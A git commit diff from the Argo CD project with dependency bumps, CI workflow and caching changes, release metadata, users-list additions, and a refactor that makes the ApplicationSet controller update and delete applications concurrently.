chore(deps): bump renovatebot/github-action from 46.1.5 to 46.1.6 (#26961 )

Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
chore(deps): update module github.com/golangci/golangci-lint/v2 to v2.11.4 (#26957 )
2026-03-23 16:58:47 +01:00 · 2026-03-23 07:26:22 -04:00 · 2026-03-22 16:14:59 -04:00 · 2026-03-22 03:01:26 -06:00 · 2026-03-22 08:03:59 +00:00 · 2026-03-21 10:35:47 +01:00
109 changed files with 29833 additions and 2575 deletions
--- a/.github/configs/renovate-config.js
+++ b/.github/configs/renovate-config.js
@@ -11,6 +11,7 @@ module.exports = {
        "github>argoproj/argo-cd//renovate-presets/custom-managers/yaml.json5",
        "github>argoproj/argo-cd//renovate-presets/fix/disable-all-updates.json5",
        "github>argoproj/argo-cd//renovate-presets/devtool.json5",
-        "github>argoproj/argo-cd//renovate-presets/docs.json5"
+        "github>argoproj/argo-cd//renovate-presets/docs.json5",
+        "group:aws-sdk-go-v2Monorepo"
    ]
 }
--- a/.github/workflows/cherry-pick-single.yml
+++ b/.github/workflows/cherry-pick-single.yml
@@ -66,6 +66,7 @@ jobs:

          # Create new branch for cherry-pick
          CHERRY_PICK_BRANCH="cherry-pick-${{ inputs.pr_number }}-to-${TARGET_BRANCH}"
+
          git checkout -b "$CHERRY_PICK_BRANCH" "origin/$TARGET_BRANCH"

          # Perform cherry-pick
@@ -75,12 +76,17 @@ jobs:
            # Extract Signed-off-by from the cherry-pick commit
            SIGNOFF=$(git log -1 --pretty=format:"%B" | grep -E '^Signed-off-by:' || echo "")

-            # Push the new branch
-            git push origin "$CHERRY_PICK_BRANCH"
+            # Push the new branch. Force push to ensure that in case the original cherry-pick branch is stale, 
+            # that the current state of the $TARGET_BRANCH + cherry-pick gets in $CHERRY_PICK_BRANCH.
+            git push origin -f "$CHERRY_PICK_BRANCH"

            # Save data for PR creation
            echo "branch_name=$CHERRY_PICK_BRANCH" >> "$GITHUB_OUTPUT"
-            echo "signoff=$SIGNOFF" >> "$GITHUB_OUTPUT"
+            {
+              echo "signoff<<EOF"
+              echo "$SIGNOFF"
+              echo "EOF"
+            } >> "$GITHUB_OUTPUT"
            echo "target_branch=$TARGET_BRANCH" >> "$GITHUB_OUTPUT"
          else
            echo "❌ Cherry-pick failed due to conflicts"
--- a/.github/workflows/ci-build.yaml
+++ b/.github/workflows/ci-build.yaml
@@ -80,12 +80,16 @@ jobs:
        uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
        with:
          go-version: ${{ env.GOLANG_VERSION }}
-      - name: Restore go build cache
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+      - name: Restore go build and module cache
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
-          path: ~/.cache/go-build
-          key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
-      - name: Download all Go modules
+          path: |
+            ~/.cache/go-build
+            ~/go/pkg/mod
+          key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
+          restore-keys: |
+            ${{ runner.os }}-go-build-v1-
+      - name: Download Go modules
        run: |
          go mod download
      - name: Compile all packages
@@ -111,7 +115,7 @@ jobs:
        uses: golangci/golangci-lint-action@1e7e51e771db61008b38414a730f564565cf7c20 # v9.2.0
        with:
          # renovate: datasource=go packageName=github.com/golangci/golangci-lint/v2 versioning=regex:^v(?<major>\d+)\.(?<minor>\d+)\.(?<patch>\d+)?$
-          version: v2.11.3
+          version: v2.11.4
          args: --verbose

  test-go:
@@ -151,11 +155,15 @@ jobs:
      - name: Add /usr/local/bin to PATH
        run: |
          echo "/usr/local/bin" >> $GITHUB_PATH
-      - name: Restore go build cache
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+      - name: Restore go build and module cache
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
-          path: ~/.cache/go-build
-          key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
+          path: |
+            ~/.cache/go-build
+            ~/go/pkg/mod
+          key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
+          restore-keys: |
+            ${{ runner.os }}-go-build-v1-
      - name: Install all tools required for building & testing
        run: |
          make install-test-tools-local
@@ -167,7 +175,7 @@ jobs:
        run: |
          git config --global user.name "John Doe"
          git config --global user.email "john.doe@example.com"
-      - name: Download and vendor all required packages
+      - name: Download Go modules
        run: |
          go mod download
      - name: Run all unit tests
@@ -215,11 +223,15 @@ jobs:
      - name: Add /usr/local/bin to PATH
        run: |
          echo "/usr/local/bin" >> $GITHUB_PATH
-      - name: Restore go build cache
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+      - name: Restore go build and module cache
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
-          path: ~/.cache/go-build
-          key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
+          path: |
+            ~/.cache/go-build
+            ~/go/pkg/mod
+          key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
+          restore-keys: |
+            ${{ runner.os }}-go-build-v1-
      - name: Install all tools required for building & testing
        run: |
          make install-test-tools-local
@@ -231,7 +243,7 @@ jobs:
        run: |
          git config --global user.name "John Doe"
          git config --global user.email "john.doe@example.com"
-      - name: Download and vendor all required packages
+      - name: Download Go modules
        run: |
          go mod download
      - name: Run all unit tests
@@ -315,7 +327,7 @@ jobs:
          node-version: '22.9.0'
      - name: Restore node dependency cache
        id: cache-dependencies
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
          path: ui/node_modules
          key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
@@ -365,7 +377,7 @@ jobs:
          fetch-depth: 0
      - name: Restore node dependency cache
        id: cache-dependencies
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
          path: ui/node_modules
          key: ${{ runner.os }}-node-dep-v2-${{ hashFiles('**/yarn.lock') }}
@@ -392,7 +404,7 @@ jobs:
      - name: Upload code coverage information to codecov.io
        # Only run when the workflow is for upstream (PR target or push is in argoproj/argo-cd).
        if: github.repository == 'argoproj/argo-cd'
-        uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
+        uses: codecov/codecov-action@1af58845a975a7985b0beb0cbe6fbbb71a41dbad # v5.5.3
        with:
          files: test-results/full-coverage.out
          fail_ci_if_error: true
@@ -401,7 +413,7 @@ jobs:
      - name: Upload test results to Codecov
        # Codecov uploads test results to Codecov.io on upstream master branch.
        if: github.repository == 'argoproj/argo-cd' && github.ref == 'refs/heads/master' && github.event_name == 'push'
-        uses: codecov/codecov-action@671740ac38dd9b0130fbe1cec585b89eea48d3de # v5.5.2
+        uses: codecov/codecov-action@1af58845a975a7985b0beb0cbe6fbbb71a41dbad # v5.5.3
        with:
          files: test-results/junit.xml
          fail_ci_if_error: true
@@ -475,11 +487,15 @@ jobs:
          sudo chown $(whoami) $HOME/.kube/config
          sudo chmod go-r $HOME/.kube/config
          kubectl version
-      - name: Restore go build cache
-        uses: actions/cache@cdf6c1fa76f9f475f3d7449005a359c84ca0f306 # v5.0.3
+      - name: Restore go build and module cache
+        uses: actions/cache@668228422ae6a00e4ad889ee87cd7109ec5666a7 # v5.0.4
        with:
-          path: ~/.cache/go-build
-          key: ${{ runner.os }}-go-build-v1-${{ github.run_id }}
+          path: |
+            ~/.cache/go-build
+            ~/go/pkg/mod
+          key: ${{ runner.os }}-go-build-v1-${{ hashFiles('**/go.sum') }}
+          restore-keys: |
+            ${{ runner.os }}-go-build-v1-
      - name: Add ~/go/bin to PATH
        run: |
          echo "$HOME/go/bin" >> $GITHUB_PATH
@@ -489,9 +505,11 @@ jobs:
      - name: Add ./dist to PATH
        run: |
          echo "$(pwd)/dist" >> $GITHUB_PATH
-      - name: Download Go dependencies
+      - name: Download Go modules
        run: |
          go mod download
+      - name: Install goreman
+        run: |
          go install github.com/mattn/goreman@latest
      - name: Install all tools required for building & testing
        run: |
--- a/.github/workflows/release.yaml
+++ b/.github/workflows/release.yaml
@@ -264,7 +264,7 @@ jobs:
          echo "hashes=$(sha256sum /tmp/sbom.tar.gz | base64 -w0)" >> "$GITHUB_OUTPUT"

      - name: Upload SBOM
-        uses: softprops/action-gh-release@a06a81a03ee405af7f2048a818ed3f03bbf83c7b # v2.5.0
+        uses: softprops/action-gh-release@153bb8e04406b158c6c84fc1615b65b24149a1fe # v2.6.1
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        with:
--- a/.github/workflows/renovate.yaml
+++ b/.github/workflows/renovate.yaml
@@ -23,7 +23,7 @@ jobs:
        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # 6.0.2

      - name: Self-hosted Renovate
-        uses: renovatebot/github-action@abd08c7549b2a864af5df4a2e369c43f035a6a9d #46.1.5
+        uses: renovatebot/github-action@68a3ea99af6ad249940b5a9fdf44fc6d7f14378b #46.1.6
        with:
          configurationFile: .github/configs/renovate-config.js
          token: '${{ steps.get_token.outputs.token }}'
--- a/2
+++ b/2
@@ -2,7 +2,7 @@ controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run
 api-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/api-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-server $COMMAND --loglevel debug --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --disable-auth=${ARGOCD_E2E_DISABLE_AUTH:-'true'} --insecure --dex-server http://localhost:${ARGOCD_E2E_DEX_PORT:-5556} --repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081} --port ${ARGOCD_E2E_APISERVER_PORT:-8080} --otlp-address=${ARGOCD_OTLP_ADDRESS} --application-namespaces=${ARGOCD_APPLICATION_NAMESPACES:-''} --hydrator-enabled=${ARGOCD_HYDRATOR_ENABLED:='false'}"
 dex: sh -c "ARGOCD_BINARY_NAME=argocd-dex go run github.com/argoproj/argo-cd/v3/cmd gendexcfg -o `pwd`/dist/dex.yaml && (test -f dist/dex.yaml || { echo 'Failed to generate dex configuration'; exit 1; }) && docker run --rm -p ${ARGOCD_E2E_DEX_PORT:-5556}:${ARGOCD_E2E_DEX_PORT:-5556} -v `pwd`/dist/dex.yaml:/dex.yaml ghcr.io/dexidp/dex:$(grep "image: ghcr.io/dexidp/dex:v2.45.0" manifests/base/dex/argocd-dex-server-deployment.yaml | cut -d':' -f3) dex serve /dex.yaml"
 redis: hack/start-redis-with-password.sh
-repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=./dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp}  ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
+repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=\$(pwd)/dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp}  ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
 cmp-server: [ "$ARGOCD_E2E_TEST" = 'true' ] && exit 0 || [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_BINARY_NAME=argocd-cmp-server ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} $COMMAND --config-dir-path ./test/cmp --loglevel debug --otlp-address=${ARGOCD_OTLP_ADDRESS}"
 commit-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/commit-server} FORCE_LOG_COLORS=1 ARGOCD_BINARY_NAME=argocd-commit-server $COMMAND --loglevel debug --port ${ARGOCD_E2E_COMMITSERVER_PORT:-8086}"
 ui: sh -c 'cd ui && ${ARGOCD_E2E_YARN_CMD:-yarn} start'
--- a/SECURITY-INSIGHTS.yml
+++ b/SECURITY-INSIGHTS.yml
@@ -3,9 +3,9 @@ header:
  expiration-date: '2024-10-31T00:00:00.000Z' # One year from initial release.
  last-updated: '2023-10-27'
  last-reviewed: '2023-10-27'
-  commit-hash: 814db444c36503851dc3d45cf9c44394821ca1a4
+  commit-hash: d91a2ab3bf1b1143fb273fa06f54073fc78f41f1
  project-url: https://github.com/argoproj/argo-cd
-  project-release: v3.4.0
+  project-release: v3.5.0
  changelog: https://github.com/argoproj/argo-cd/releases
  license: https://github.com/argoproj/argo-cd/blob/master/LICENSE
 project-lifecycle:
--- a/USERS.md
+++ b/USERS.md
@@ -240,6 +240,7 @@ Currently, the following organizations are **officially** using Argo CD:
 1. [Mission Lane](https://missionlane.com)
 1. [mixi Group](https://mixi.co.jp/)
 1. [Moengage](https://www.moengage.com/)
+1. [Mollie](https://www.mollie.com/)
 1. [Money Forward](https://corp.moneyforward.com/en/)
 1. [MongoDB](https://www.mongodb.com/)
 1. [MOO Print](https://www.moo.com/)
@@ -380,6 +381,7 @@ Currently, the following organizations are **officially** using Argo CD:
 1. [Tailor Brands](https://www.tailorbrands.com)
 1. [Tamkeen Technologies](https://tamkeentech.sa/)
 1. [TBC Bank](https://tbcbank.ge/)
+1. [Techcom Securities](https://www.tcbs.com.vn/)
 1. [Techcombank](https://www.techcombank.com.vn/trang-chu)
 1. [Technacy](https://www.technacy.it/)
 1. [Telavita](https://www.telavita.com.br/)
--- a/2
+++ b/2
@@ -1 +1 @@
-3.4.0-rc2
+3.5.0
--- a/applicationset/controllers/applicationset_controller.go
+++ b/applicationset/controllers/applicationset_controller.go
@@ -24,11 +24,13 @@ import (
 	"sort"
 	"strconv"
 	"strings"
+	"sync"
 	"time"

 	"github.com/google/go-cmp/cmp"
 	"github.com/google/go-cmp/cmp/cmpopts"
 	log "github.com/sirupsen/logrus"
+	"golang.org/x/sync/errgroup"
 	corev1 "k8s.io/api/core/v1"
 	apierrors "k8s.io/apimachinery/pkg/api/errors"
 	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
@@ -74,6 +76,9 @@ const (
 	ReconcileRequeueOnValidationError = time.Minute * 3
 	ReverseDeletionOrder              = "Reverse"
 	AllAtOnceDeletionOrder            = "AllAtOnce"
+	revisionAndSpecChangedMsg         = "Application has pending changes (revision and spec differ), setting status to Waiting"
+	revisionChangedMsg                = "Application has pending changes, setting status to Waiting"
+	specChangedMsg                    = "Application has pending changes (spec differs), setting status to Waiting"
 )

 var defaultPreservedFinalizers = []string{
@@ -103,15 +108,16 @@ type ApplicationSetReconciler struct {
 	Policy               argov1alpha1.ApplicationsSyncPolicy
 	EnablePolicyOverride bool
 	utils.Renderer
-	ArgoCDNamespace            string
-	ApplicationSetNamespaces   []string
-	EnableProgressiveSyncs     bool
-	SCMRootCAPath              string
-	GlobalPreservedAnnotations []string
-	GlobalPreservedLabels      []string
-	Metrics                    *metrics.ApplicationsetMetrics
-	MaxResourcesStatusCount    int
-	ClusterInformer            *settings.ClusterInformer
+	ArgoCDNamespace              string
+	ApplicationSetNamespaces     []string
+	EnableProgressiveSyncs       bool
+	SCMRootCAPath                string
+	GlobalPreservedAnnotations   []string
+	GlobalPreservedLabels        []string
+	Metrics                      *metrics.ApplicationsetMetrics
+	MaxResourcesStatusCount      int
+	ClusterInformer              *settings.ClusterInformer
+	ConcurrentApplicationUpdates int
 }

 // +kubebuilder:rbac:groups=argoproj.io,resources=applicationsets,verbs=get;list;watch;create;update;patch;delete
@@ -688,108 +694,133 @@ func (r *ApplicationSetReconciler) SetupWithManager(mgr ctrl.Manager, enableProg
 // - For existing application, it will call update
 // The function also adds owner reference to all applications, and uses it to delete them.
 func (r *ApplicationSetReconciler) createOrUpdateInCluster(ctx context.Context, logCtx *log.Entry, applicationSet argov1alpha1.ApplicationSet, desiredApplications []argov1alpha1.Application) error {
-	var firstError error
-	// Creates or updates the application in appList
-	for _, generatedApp := range desiredApplications {
-		appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))
+	// Build the diff config once per reconcile.
+	// Diff config is per applicationset, so generate it once for all applications
+	diffConfig, err := utils.BuildIgnoreDiffConfig(applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{})
+	if err != nil {
+		return fmt.Errorf("failed to build ignore diff config: %w", err)
+	}

+	g, ctx := errgroup.WithContext(ctx)
+	concurrency := r.concurrency()
+	g.SetLimit(concurrency)
+
+	var appErrorsMu sync.Mutex
+	appErrors := map[string]error{}
+
+	for _, generatedApp := range desiredApplications {
 		// Normalize to avoid fighting with the application controller.
 		generatedApp.Spec = *argoutil.NormalizeApplicationSpec(&generatedApp.Spec)
+		g.Go(func() error {
+			appLog := logCtx.WithFields(applog.GetAppLogFields(&generatedApp))

-		found := &argov1alpha1.Application{
-			ObjectMeta: metav1.ObjectMeta{
-				Name:      generatedApp.Name,
-				Namespace: generatedApp.Namespace,
-			},
-			TypeMeta: metav1.TypeMeta{
-				Kind:       application.ApplicationKind,
-				APIVersion: "argoproj.io/v1alpha1",
-			},
-		}
-
-		action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, applicationSet.Spec.IgnoreApplicationDifferences, normalizers.IgnoreNormalizerOpts{}, found, func() error {
-			// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
-			found.Spec = generatedApp.Spec
-
-			// allow setting the Operation field to trigger a sync operation on an Application
-			if generatedApp.Operation != nil {
-				found.Operation = generatedApp.Operation
+			found := &argov1alpha1.Application{
+				ObjectMeta: metav1.ObjectMeta{
+					Name:      generatedApp.Name,
+					Namespace: generatedApp.Namespace,
+				},
+				TypeMeta: metav1.TypeMeta{
+					Kind:       application.ApplicationKind,
+					APIVersion: "argoproj.io/v1alpha1",
+				},
 			}

-			preservedAnnotations := make([]string, 0)
-			preservedLabels := make([]string, 0)
+			action, err := utils.CreateOrUpdate(ctx, appLog, r.Client, diffConfig, found, func() error {
+				// Copy only the Application/ObjectMeta fields that are significant, from the generatedApp
+				found.Spec = generatedApp.Spec

-			if applicationSet.Spec.PreservedFields != nil {
-				preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
-				preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
-			}
-
-			if len(r.GlobalPreservedAnnotations) > 0 {
-				preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
-			}
-
-			if len(r.GlobalPreservedLabels) > 0 {
-				preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
-			}
-
-			// Preserve specially treated argo cd annotations:
-			// * https://github.com/argoproj/applicationset/issues/180
-			// * https://github.com/argoproj/argo-cd/issues/10500
-			preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
-
-			for _, key := range preservedAnnotations {
-				if state, exists := found.Annotations[key]; exists {
-					if generatedApp.Annotations == nil {
-						generatedApp.Annotations = map[string]string{}
-					}
-					generatedApp.Annotations[key] = state
+				// allow setting the Operation field to trigger a sync operation on an Application
+				if generatedApp.Operation != nil {
+					found.Operation = generatedApp.Operation
 				}
-			}

-			for _, key := range preservedLabels {
-				if state, exists := found.Labels[key]; exists {
-					if generatedApp.Labels == nil {
-						generatedApp.Labels = map[string]string{}
-					}
-					generatedApp.Labels[key] = state
+				preservedAnnotations := make([]string, 0)
+				preservedLabels := make([]string, 0)
+
+				if applicationSet.Spec.PreservedFields != nil {
+					preservedAnnotations = append(preservedAnnotations, applicationSet.Spec.PreservedFields.Annotations...)
+					preservedLabels = append(preservedLabels, applicationSet.Spec.PreservedFields.Labels...)
 				}
-			}

-			// Preserve deleting finalizers and avoid diff conflicts
-			for _, finalizer := range defaultPreservedFinalizers {
-				for _, f := range found.Finalizers {
-					// For finalizers, use prefix matching in case it contains "/" stages
-					if strings.HasPrefix(f, finalizer) {
-						generatedApp.Finalizers = append(generatedApp.Finalizers, f)
+				if len(r.GlobalPreservedAnnotations) > 0 {
+					preservedAnnotations = append(preservedAnnotations, r.GlobalPreservedAnnotations...)
+				}
+
+				if len(r.GlobalPreservedLabels) > 0 {
+					preservedLabels = append(preservedLabels, r.GlobalPreservedLabels...)
+				}
+
+				// Preserve specially treated argo cd annotations:
+				// * https://github.com/argoproj/applicationset/issues/180
+				// * https://github.com/argoproj/argo-cd/issues/10500
+				preservedAnnotations = append(preservedAnnotations, defaultPreservedAnnotations...)
+
+				for _, key := range preservedAnnotations {
+					if state, exists := found.Annotations[key]; exists {
+						if generatedApp.Annotations == nil {
+							generatedApp.Annotations = map[string]string{}
+						}
+						generatedApp.Annotations[key] = state
 					}
 				}
+
+				for _, key := range preservedLabels {
+					if state, exists := found.Labels[key]; exists {
+						if generatedApp.Labels == nil {
+							generatedApp.Labels = map[string]string{}
+						}
+						generatedApp.Labels[key] = state
+					}
+				}
+
+				// Preserve deleting finalizers and avoid diff conflicts
+				for _, finalizer := range defaultPreservedFinalizers {
+					for _, f := range found.Finalizers {
+						// For finalizers, use prefix matching in case it contains "/" stages
+						if strings.HasPrefix(f, finalizer) {
+							generatedApp.Finalizers = append(generatedApp.Finalizers, f)
+						}
+					}
+				}
+
+				found.Annotations = generatedApp.Annotations
+				found.Labels = generatedApp.Labels
+				found.Finalizers = generatedApp.Finalizers
+
+				return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
+			})
+			if err != nil {
+				appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
+				// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
+				if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+					return err
+				}
+				// For backwards compatibility with sequential behavior: continue processing other applications
+				// but record the error keyed by app name so we can deterministically return the error from
+				// the lexicographically first failing app, regardless of goroutine scheduling order.
+				appErrorsMu.Lock()
+				appErrors[generatedApp.Name] = err
+				appErrorsMu.Unlock()
+				return nil
 			}

-			found.Annotations = generatedApp.Annotations
-			found.Labels = generatedApp.Labels
-			found.Finalizers = generatedApp.Finalizers
-
-			return controllerutil.SetControllerReference(&applicationSet, found, r.Scheme)
+			if action != controllerutil.OperationResultNone {
+				// Don't pollute etcd with "unchanged Application" events
+				r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
+				appLog.Logf(log.InfoLevel, "%s Application", action)
+			} else {
+				// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
+				// Or enable debug logging
+				appLog.Logf(log.DebugLevel, "%s Application", action)
+			}
+			return nil
 		})
-		if err != nil {
-			appLog.WithError(err).WithField("action", action).Errorf("failed to %s Application", action)
-			if firstError == nil {
-				firstError = err
-			}
-			continue
-		}
-
-		if action != controllerutil.OperationResultNone {
-			// Don't pollute etcd with "unchanged Application" events
-			r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, fmt.Sprint(action), "%s Application %q", action, generatedApp.Name)
-			appLog.Logf(log.InfoLevel, "%s Application", action)
-		} else {
-			// "unchanged Application" can be inferred by Reconcile Complete with no action being listed
-			// Or enable debug logging
-			appLog.Logf(log.DebugLevel, "%s Application", action)
-		}
 	}
-	return firstError
+
+	if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+		return err
+	}
+	return firstAppError(appErrors)
 }

 // createInCluster will filter from the desiredApplications only the application that needs to be created
@@ -849,36 +880,84 @@ func (r *ApplicationSetReconciler) deleteInCluster(ctx context.Context, logCtx *
 		m[app.Name] = true
 	}

-	// Delete apps that are not in m[string]bool
-	var firstError error
-	for _, app := range current {
-		logCtx = logCtx.WithFields(applog.GetAppLogFields(&app))
-		_, exists := m[app.Name]
+	g, ctx := errgroup.WithContext(ctx)
+	concurrency := r.concurrency()
+	g.SetLimit(concurrency)

-		if !exists {
+	var appErrorsMu sync.Mutex
+	appErrors := map[string]error{}
+
+	// Delete apps that are not in m[string]bool
+	for _, app := range current {
+		_, exists := m[app.Name]
+		if exists {
+			continue
+		}
+		appLogCtx := logCtx.WithFields(applog.GetAppLogFields(&app))
+		g.Go(func() error {
 			// Removes the Argo CD resources finalizer if the application contains an invalid target (eg missing cluster)
-			err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, logCtx)
+			err := r.removeFinalizerOnInvalidDestination(ctx, applicationSet, &app, clusterList, appLogCtx)
 			if err != nil {
-				logCtx.WithError(err).Error("failed to update Application")
-				if firstError != nil {
-					firstError = err
+				appLogCtx.WithError(err).Error("failed to update Application")
+				// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
+				if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+					return err
 				}
-				continue
+				// For backwards compatibility with sequential behavior: continue processing other applications
+				// but record the error keyed by app name so we can deterministically return the error from
+				// the lexicographically first failing app, regardless of goroutine scheduling order.
+				appErrorsMu.Lock()
+				appErrors[app.Name] = err
+				appErrorsMu.Unlock()
+				return nil
 			}

 			err = r.Delete(ctx, &app)
 			if err != nil {
-				logCtx.WithError(err).Error("failed to delete Application")
-				if firstError != nil {
-					firstError = err
+				appLogCtx.WithError(err).Error("failed to delete Application")
+				// If the context was canceled or its deadline exceeded, return the error so it propagates through g.Wait().
+				if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+					return err
 				}
-				continue
+				appErrorsMu.Lock()
+				appErrors[app.Name] = err
+				appErrorsMu.Unlock()
+				return nil
 			}
 			r.Recorder.Eventf(&applicationSet, corev1.EventTypeNormal, "Deleted", "Deleted Application %q", app.Name)
-			logCtx.Log(log.InfoLevel, "Deleted application")
-		}
+			appLogCtx.Log(log.InfoLevel, "Deleted application")
+			return nil
+		})
 	}
-	return firstError
+
+	if err := g.Wait(); errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
+		return err
+	}
+	return firstAppError(appErrors)
+}
+
+// concurrency returns the configured number of concurrent application updates, defaulting to 1.
+func (r *ApplicationSetReconciler) concurrency() int {
+	if r.ConcurrentApplicationUpdates <= 0 {
+		return 1
+	}
+	return r.ConcurrentApplicationUpdates
+}
+
+// firstAppError returns the error associated with the lexicographically smallest application name
+// in the provided map. This gives a deterministic result when multiple goroutines may have
+// recorded errors concurrently, matching the behavior of the original sequential loop where the
+// first application in iteration order would determine the returned error.
+func firstAppError(appErrors map[string]error) error {
+	if len(appErrors) == 0 {
+		return nil
+	}
+	names := make([]string, 0, len(appErrors))
+	for name := range appErrors {
+		names = append(names, name)
+	}
+	sort.Strings(names)
+	return appErrors[names[0]]
 }
